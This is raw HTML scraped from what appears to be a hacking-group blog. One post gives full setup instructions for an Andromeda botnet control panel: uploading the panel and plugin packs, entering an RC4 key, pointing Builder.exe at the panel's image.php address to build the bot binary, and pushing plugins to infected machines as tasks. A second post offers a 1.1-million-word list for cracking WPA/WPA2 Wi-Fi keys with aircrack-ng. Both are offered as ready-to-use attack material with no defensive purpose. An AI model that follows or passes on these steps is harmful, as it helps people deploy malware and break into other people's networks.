<a href="http://1.bp.blogspot.com/-V5w3CjESLr4/URgOqxA0sTI/AAAAAAAAAGY/xvAVKEarXQc/s1600/f584fb.jpg" style="color: #444444; margin-left: 1em; margin-right: 1em; text-decoration: none;"><span style="font-family: Verdana, sans-serif;"><img border="0" src="http://1.bp.blogspot.com/-V5w3CjESLr4/URgOqxA0sTI/AAAAAAAAAGY/xvAVKEarXQc/s320/f584fb.jpg" height="150" style="-webkit-box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; background-color: #222222; background-position: initial initial; background-repeat: initial initial; border-bottom-left-radius: 0px; border-bottom-right-radius: 0px; border-top-left-radius: 0px; border-top-right-radius: 0px; border: 1px solid transparent; box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; padding: 8px; position: relative;" width="320" /></span></a></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /><span class="short_text" id="result_box" lang="en"><span style="color: #e69138; font-size: large;">Configuration</span></span><br /><span class="Apple-style-span" style="border-collapse: separate; color: black; line-height: normal; orphans: 2; widows: 2;"><span class="Apple-style-span" style="color: silver; text-align: center;"><br /></span></span><span class="Apple-style-span" style="border-collapse: separate; color: black; line-height: normal; orphans: 2; widows: 2;"><span class="Apple-style-span" style="color: #f3f3f3; text-align: center;">1. Upload /Panel files to androhost.com/andro<br />2. Create one mysql db.<br />3. Upload f.pack, r.pack and s.pack from /Plugins folder in: androhost.com/andro directory<br />4. chmod 777 androhost.com/andro/config.php, chmod 777 androhost.com/andro/fp_logs directory<br />5. Open in your browser androhost.com/andro/index.php?act=install.<br />6. Login with default creditials: admin:admin<br />7. Paste rc4 key to andromeda installation page. d40e75961383124949436f37f45a8cb6<br />8. Fill up all instalation page with your admin user and pasw, plus mysql details >> click 'Install'<br />9. After installation is done open in your browser androhost.com/andro/ifg.php<br />10. Delete androhost.com/andro/ifg.php and androhost.com/andro/GeoIPCountryWhois.csv.gz<br />11. Open Builder.exe > change host to: <a href="http://androhost.com/andro/image.php" style="text-decoration: none;" target="_blank">http://androhost.com/andro/image.php</a>, rc4 key to: d40e75961383124949436f37f45a8cb6 and build your bin.<br />12. For enable plugins just go in panel > menu > tasks > add task<br />Task type = install plugin<br />Url= <a href="http://androhost.com/andro/r.pack" style="text-decoration: none;" target="_blank">http://androhost.com/andro/r.pack</a><br />Click 'Enabled' and add your task.</span></span></span><span class="Apple-style-span" style="border-collapse: separate; color: black; font-family: 'Times New Roman'; font-size: xx-small; line-height: normal; orphans: 2; widows: 2;"><span class="Apple-style-span" style="color: silver; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px; text-align: center;"><br /></span></span><br />
<span style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="border-collapse: separate; color: black; line-height: normal; orphans: 2; widows: 2;"><span class="Apple-style-span" style="color: #f3f3f3; text-align: center;"><br /></span></span></span>
<span style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="border-collapse: separate; color: black; line-height: normal; orphans: 2; widows: 2;"><span class="Apple-style-span" style="color: #f3f3f3; text-align: center;"><br /></span></span></span>
<span style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="border-collapse: separate; color: black; line-height: normal; orphans: 2; widows: 2;"><span class="Apple-style-span" style="color: #f3f3f3; text-align: center;"><br /></span></span></span></div>
</div>
CHChttp://www.blogger.com/profile/05341889266903644178noreply@blogger.com0tag:blogger.com,1999:blog-5858162330672279498.post-64491418832474979902013-06-17T16:57:00.002-04:002013-06-17T16:57:47.818-04:00Wordlist for BruteForce Attack<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="color: #e69138; font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: x-large;">1.1 Million Wordlist for hacking</span></div>
<br />
<br />
<br />
<div style="text-align: center;">
<img height="265" src="http://img0.etsystatic.com/000/0/5479662/il_fullxfull.232986892.jpg" width="400" /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="background-color: transparent; line-height: 18px; padding: 5px 0px;">
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;">Hello CHC(Chennai Hackers Connect) Members ,To crack WPA/WPA2 pre-shared key. you need a dictionary of words as input. Basically, aircrack-ng takes each word and tests to see if this is in fact the pre-shared key.</span></div>
<div style="background-color: transparent; line-height: 18px; padding: 5px 0px;">
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;">The first easiest way is do an Internet search for word lists and dictionaries or check out web sites for password cracking tools.</span><br />
<span style="font-family: Verdana, sans-serif;"><span style="color: #f3f3f3;"><br />Also Wordlist can be created using some tools .It also Available inbulid in Backtrack 5. For wordlist creation tutorial</span> <a href="http://chennaihackers.blogspot.in/2013/04/generating-phone-number-wordlist.html" target="_blank">Check here</a></span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<a href="http://www.4shared.com/office/t92tq-tT/11million_word_list.html?" target="_blank"><img height="200" src="http://namethinger.com/main/sites/default/files/117812-matte-blue-and-white-square-icon-signs-electrical-shock3.png" width="200" /></a></div>
<div style="text-align: center;">
<span style="color: #3d85c6;">Download here</span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
</div>
CHChttp://www.blogger.com/profile/05341889266903644178noreply@blogger.com0